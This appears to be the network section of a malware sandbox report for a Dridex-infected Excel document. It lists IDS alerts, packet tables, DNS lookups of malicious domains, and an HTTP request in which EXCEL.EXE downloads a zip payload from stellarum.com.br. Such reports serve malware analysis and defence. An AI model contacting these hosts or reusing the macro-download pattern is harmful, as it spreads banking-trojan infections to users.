                                                                                                01/21/21-16:05:18.964732TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649246198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:19.109059TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349247194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:19.347931TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649248198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:19.347931TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649248198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:20.323663TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349250194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:20.449693TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349249211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:20.694333TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349251194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:21.687198TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349252211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:22.041230TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349253211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:23.802663TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649255198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:23.802663TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649255198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:25.123593TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349259194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:25.127942TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649258198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:25.127942TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649258198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:25.432173TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649260198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:25.432173TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649260198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:26.172896TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649261198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:26.172896TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649261198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:26.469088TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349263194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:26.476599TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349262211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:27.255584TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349264194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:27.515480TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349265194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:27.829986TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349266211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:28.857854TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349268211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:29.538797TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349269211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:29.555104TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349270194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:29.794028TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649271198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:29.794028TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649271198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:30.894885TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349273211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:31.183587TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349275194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:31.925991TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649276198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:31.925991TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649276198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:32.399770TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649278198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:32.399770TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649278198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:32.547137TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349277211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:32.907417TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349279211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:33.273708TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349281194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:33.720570TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349282194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:34.266517TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649283198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:34.266517TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649283198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:34.654997TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349284211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:35.059826TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349286211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:35.610055TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349288194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:35.905508TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649289198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:35.905508TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649289198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:36.981764TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349290211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:37.133510TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649292198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:37.133510TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649292198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:37.258397TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349294194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:38.110702TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649295198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:38.110702TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649295198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:38.452090TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649297198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:38.452090TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649297198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:38.472694TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349298194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:38.604331TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349296211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:39.452082TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349300194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:39.785106TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349302194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:39.826455TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349301211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:40.300104TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649303198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:40.300104TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649303198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:40.820554TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349304211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:41.144735TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349306211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:41.637602TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349307194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:41.999790TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649308198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:41.999790TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649308198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:43.014369TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349311211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:43.339614TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649313198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:43.339614TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649313198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:43.339690TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349314194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:44.113688TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649315198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:44.113688TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649315198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:44.417558TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649316198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:44.417558TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649316198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:44.681731TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349318194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:44.705140TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349317211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:45.476337TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349319194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:45.738256TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349320194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:46.072429TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349321211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:46.222007TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349322211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:47.579711TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649326198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:47.579711TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649326198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:47.633977TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349325211.110.44.63192.168.2.22

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 21, 2021 16:03:16.729130030 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:16.882597923 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:16.882765055 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:16.897286892 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:17.052475929 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:17.059746027 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:17.059777975 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:17.059792042 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:17.060127020 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:17.075743914 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:17.229973078 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:17.230173111 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:18.823402882 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.011595011 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.011969090 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.012629986 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.012778044 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.013767958 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.013876915 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.015007019 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.015099049 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.016062021 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.016165972 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.017213106 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.017319918 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.035115004 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.035307884 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.036190033 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.036242962 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.037405968 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.037460089 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.038475037 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.038553953 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.181190968 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.181344986 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.182230949 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.182346106 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.183373928 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.183484077 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.184501886 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.184618950 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.190718889 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.190891027 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.191659927 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.191742897 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.192830086 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.192914009 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.194027901 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.194128036 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.199939966 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.200174093 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.201013088 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.201092958 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.202255964 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.202354908 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.203347921 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.203434944 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.209294081 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.209392071 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.210314035 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.210405111 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.211461067 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.211570024 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.212594986 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.212696075 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.218621969 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.218759060 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.219635963 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.219729900 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.220717907 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.220813990 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.221916914 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.222024918 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.351401091 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.351650000 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.352320910 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.352492094 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.353482008 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.353657007 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.354619026 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.354733944 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.365151882 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.365401030 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.366188049 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.366296053 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.367347002 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.367460012 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.368439913 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.368549109 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.385782957 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.386220932 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.386970043 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.387110949 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.387964964 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.388113022 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.389167070 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.389311075 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.390247107 CET4434916564.37.52.172192.168.2.22
                                                                                                Jan 21, 2021 16:03:19.390435934 CET49165443192.168.2.2264.37.52.172
                                                                                                Jan 21, 2021 16:03:19.391315937 CET4434916564.37.52.172192.168.2.22

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 21, 2021 16:03:16.526415110 CET5219753192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:03:16.711199999 CET53521978.8.8.8192.168.2.22
                                                                                                Jan 21, 2021 16:03:17.592540979 CET5309953192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:03:17.640499115 CET53530998.8.8.8192.168.2.22
                                                                                                Jan 21, 2021 16:03:17.651228905 CET5283853192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:03:17.699147940 CET53528388.8.8.8192.168.2.22
                                                                                                Jan 21, 2021 16:03:18.240075111 CET6120053192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:03:18.288335085 CET53612008.8.8.8192.168.2.22
                                                                                                Jan 21, 2021 16:03:18.293981075 CET4954853192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:03:18.341964960 CET53495488.8.8.8192.168.2.22
                                                                                                Jan 21, 2021 16:03:26.437694073 CET5562753192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:03:27.438571930 CET5562753192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:03:27.500000000 CET53556278.8.8.8192.168.2.22
                                                                                                Jan 21, 2021 16:03:27.533200026 CET53556278.8.8.8192.168.2.22
                                                                                                Jan 21, 2021 16:03:37.413358927 CET5600953192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:03:37.951539993 CET53560098.8.8.8192.168.2.22
                                                                                                Jan 21, 2021 16:04:25.462573051 CET6186553192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:04:25.519269943 CET53618658.8.8.8192.168.2.22
                                                                                                Jan 21, 2021 16:04:31.024112940 CET5517153192.168.2.228.8.8.8
                                                                                                Jan 21, 2021 16:04:31.227071047 CET53551718.8.8.8192.168.2.22

                                                                                                ICMP Packets

                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                Jan 21, 2021 16:03:27.533313036 CET192.168.2.228.8.8.8d016(Port unreachable)Destination Unreachable

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                Jan 21, 2021 16:03:16.526415110 CET192.168.2.228.8.8.80xccaeStandard query (0)qsf.surfescape.netA (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:03:26.437694073 CET192.168.2.228.8.8.80x9ffeStandard query (0)stellarum.com.brA (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:03:27.438571930 CET192.168.2.228.8.8.80x9ffeStandard query (0)stellarum.com.brA (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:03:37.413358927 CET192.168.2.228.8.8.80xd237Standard query (0)reliablelifts.co.inA (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:04:25.462573051 CET192.168.2.228.8.8.80xfe26Standard query (0)shopandmartonline.comA (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:04:31.024112940 CET192.168.2.228.8.8.80x2cc0Standard query (0)creditoenusa.comA (IP address)IN (0x0001)

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                Jan 21, 2021 16:03:16.711199999 CET8.8.8.8192.168.2.220xccaeNo error (0)qsf.surfescape.net64.37.52.172A (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:03:27.500000000 CET8.8.8.8192.168.2.220x9ffeNo error (0)stellarum.com.br191.252.144.65A (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:03:27.533200026 CET8.8.8.8192.168.2.220x9ffeNo error (0)stellarum.com.br191.252.144.65A (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:03:37.951539993 CET8.8.8.8192.168.2.220xd237No error (0)reliablelifts.co.in103.83.81.27A (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:04:25.519269943 CET8.8.8.8192.168.2.220xfe26No error (0)shopandmartonline.com198.136.54.91A (IP address)IN (0x0001)
                                                                                                Jan 21, 2021 16:04:31.227071047 CET8.8.8.8192.168.2.220x2cc0No error (0)creditoenusa.com192.185.224.50A (IP address)IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • stellarum.com.br

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.2249168191.252.144.6580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Jan 21, 2021 16:03:27.767260075 CET748OUTGET /hknmwj.zip HTTP/1.1
                                                                                                Accept: */*
                                                                                                UA-CPU: AMD64
                                                                                                Accept-Encoding: gzip, deflate
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                Host: stellarum.com.br
                                                                                                Connection: Keep-Alive
                                                                                                Jan 21, 2021 16:03:28.032418013 CET750INHTTP/1.1 200 OK
                                                                                                Date: Thu, 21 Jan 2021 15:03:27 GMT
                                                                                                Server: Apache
                                                                                                Last-Modified: Sat, 19 May 2018 08:09:45 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Content-Length: 856064
                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/zip
